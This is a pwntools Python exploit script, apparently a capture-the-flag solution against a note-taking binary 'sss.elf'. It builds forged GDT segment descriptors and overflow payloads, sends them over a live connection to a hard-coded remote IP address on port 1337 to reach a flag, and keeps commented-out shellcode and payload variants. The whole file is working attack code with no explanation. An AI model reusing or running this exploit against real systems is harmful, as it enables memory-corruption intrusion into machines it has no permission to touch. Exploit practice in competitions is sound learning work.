129 lines
3.2 KiB
Python
Executable file
129 lines
3.2 KiB
Python
Executable file
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
# This exploit template was generated via:
|
|
# $ pwn template ./sss.elf
|
|
from pwn import *
|
|
|
|
# Set up pwntools for the correct architecture
|
|
exe = context.binary = ELF(args.EXE or './sss.elf')
|
|
context.log_level = 'debug'
|
|
|
|
# Many built-in settings can be controlled on the command-line and show up
|
|
# in "args". For example, to dump all data sent/received, and disable ASLR
|
|
# for all created processes...
|
|
# ./exploit.py DEBUG NOASLR
|
|
|
|
|
|
|
|
def start(argv=[], *a, **kw):
|
|
'''Start the exploit against the target.'''
|
|
if args.GDB:
|
|
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
|
|
else:
|
|
return process([exe.path] + argv, *a, **kw)
|
|
|
|
# Specify your GDB script here for debugging
|
|
# GDB will be launched if the exploit is run via e.g.
|
|
# ./exploit.py GDB
|
|
gdbscript = '''
|
|
tbreak *0x{exe.entry:x}
|
|
continue
|
|
'''.format(**locals())
|
|
|
|
#===========================================================
|
|
# EXPLOIT GOES HERE
|
|
#===========================================================
|
|
# Arch: i386-32-little
|
|
# RELRO: No RELRO
|
|
# Stack: No canary found
|
|
# NX: NX enabled
|
|
# PIE: No PIE (0x1000)
|
|
# RWX: Has RWX segments
|
|
# Stripped: No
|
|
# Debuginfo: Yes
|
|
|
|
def create_seg_descriptor(base, limi):
|
|
seg = p16((limi >> 12) & 0xffff) #limit low
|
|
seg += p16(base & 0xffff) #base low
|
|
seg += p8((base >> 16) & 0xff) #base mid
|
|
stype = 2
|
|
s = 1
|
|
dpl = 0
|
|
p = 1
|
|
seg += p8(stype | (s << 4) | (dpl << 5) | (p << 7)) #flags
|
|
g = 1
|
|
db = 1
|
|
seg += p8(limi >> 16 & 0xf | g << 7 | db << 6) #flags
|
|
seg += p8(base >> 24) #base high
|
|
return seg
|
|
gdt = 0x1000000
|
|
kds_base = 0x1000000
|
|
utok_add = 0x100000
|
|
bytes_read = 127
|
|
ucs_off = 0x10
|
|
val = gdt - kds_base - utok_add - bytes_read + ucs_off
|
|
buf_read = 0x4f2c
|
|
flag_pos = 0x500000 * 4
|
|
if (val < 0):
|
|
val = val + 2**32
|
|
|
|
retaddr = 0x4e90
|
|
ds_base = 0x4ef4 + 0x1100000 - retaddr
|
|
#io = start()
|
|
#io = process('./run.sh')
|
|
#io = remote('localhost', 1337)
|
|
io = remote('37.27.204.218', 1337)
|
|
io.recvuntil('>')
|
|
io.sendline('1')
|
|
io.recvuntil('note?')
|
|
# io.send('A'*56)
|
|
# io.send(p32(flag_pos - ds_base))
|
|
# io.send(p32(exe.symbols['userspace_write']))
|
|
# io.sendline(cyclic(98-56-8))
|
|
io.sendline('D'*98)
|
|
|
|
io.recvuntil('>')
|
|
io.sendline('1')
|
|
io.recvuntil('note?')
|
|
io.sendline('B'*98)
|
|
|
|
io.recvuntil('>')
|
|
io.sendline('1')
|
|
io.recvuntil('note?')
|
|
|
|
|
|
io.send('CCCC')
|
|
io.send(p32(val))
|
|
# io.send('F'*56)
|
|
# io.send(p32(0x10))
|
|
# io.send(p32(flag_pos - ds_base))
|
|
# io.send(p32(exe.symbols['userspace_write']))
|
|
# io.send(b'G'*4)
|
|
# io.send(p32(0x10))
|
|
# io.send(p32(flag_pos - ds_base))
|
|
# io.sendline(cyclic(119-56-12-12))
|
|
io.sendline(cyclic(119))
|
|
io.recvuntil('>')
|
|
io.sendline('3')
|
|
io.recvuntil('remarks')
|
|
kds = create_seg_descriptor(flag_pos - 0x100000 - buf_read, 0xffffffff)
|
|
ds = create_seg_descriptor(ds_base, 0xfffff)
|
|
io.sendline(kds)
|
|
# io.send(p32(val))
|
|
# io.sendline(cyclic(128 - 1 - 4))
|
|
# io.recvuntil('Inserisci la tua nota:')
|
|
# io.sendline(cyclic(128))
|
|
# io.send('2')
|
|
# data = io.recvuntil('Esci')
|
|
# print(data)
|
|
# shellcode = asm(shellcraft.sh())
|
|
# payload = fit({
|
|
# 32: 0xdeadbeef,
|
|
# 'iaaa': [1, 2, 'Hello', 3]
|
|
# }, length=128)
|
|
# io.send(payload)
|
|
# flag = io.recv(...)
|
|
# log.success(flag)
|
|
|
|
io.interactive()
|
|
|